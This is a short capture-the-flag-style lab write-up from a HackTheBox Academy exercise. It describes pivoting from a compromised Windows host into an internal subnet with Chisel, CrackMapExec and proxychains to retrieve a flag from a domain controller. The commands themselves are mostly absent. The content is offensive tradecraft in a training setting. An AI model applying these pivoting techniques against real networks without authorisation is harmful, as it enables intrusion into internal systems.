Proxychains with CME
Whenever we need to pivot in a network, we can use CrackMapExec through proxychain. HackTheBox Academy showed us to pivot using Chisel.
The following scenario is proposed:
Our attacker machine has the IP 10.10.15.126. We compromised the machine 10.129.204.178 which has another interface on the network 172.16.1.0/24.
We could confirm this by executing the Windows ipconfig
command on the compromised machine.
Our objective is to be able to read a file on the 172.16.1.10 asset. To do that pivoting through our compromised host is needed.
Windows as client and Linux as server
The first scenario is implementing a reverse socks proxy where our compromised host connect to the proxy server on our attacker machine.
We first need to upload the Chisel binaries both on our attacker machine and on the compromised host. We have to choose the right version of Chisel according to the OS of our attacker machine and the compromised host.
We first started the Chisel server on our attacker machine.
As seen below, we used CME to download the Chisel Binary for Windows on the compromised host. As we are running CME inside a container, we had to share a folder between the isolated Docker environment and our host machine to transfer the Chisel binary. To do that, I created a shared volume using the -v /home/amandine/:/tmp
flag to the command docker run
. This means that the content of the /home/amandine
folder on my host machine will be shared with the /tmp
folder in the Docker environment.
The complete Docker run command to start the container is as followed:
Then, using CME, I executed the command for the Chisel client to connect to my Chisel server.
This created the tunnel between my attacker machine and the compromised host. The compromised host will be used to forward the traffic from my attacker machine to the network 172.16.1.0/24.
I now have to configure proxychains in the Docker environment. Since, I used the flag --network host
while starting the Docker container my host network will be shared with the Docker environment.
I downloaded proxychains in the Docker environment using apt
and I set up the /etc/proxychains.conf
file in my Docker environment with the following entry.
Now that my tunnel is set up and proxychains is configured on the Docker environment, I can use proxychains to list files in the flag shared folder.
As seen below, I could download theflag.txt
file located on the DC01 machine through proxychains.
Linux as client and Windows as server
Hack The Box also proposed us to explore a simple proxy, where our attacker machine will play the client and the Windows compromised host acts has the server.
Starting the proxy server on the compromised host using CrackMapExec.
Connecting the Chisel client on my attacker host.
Last updated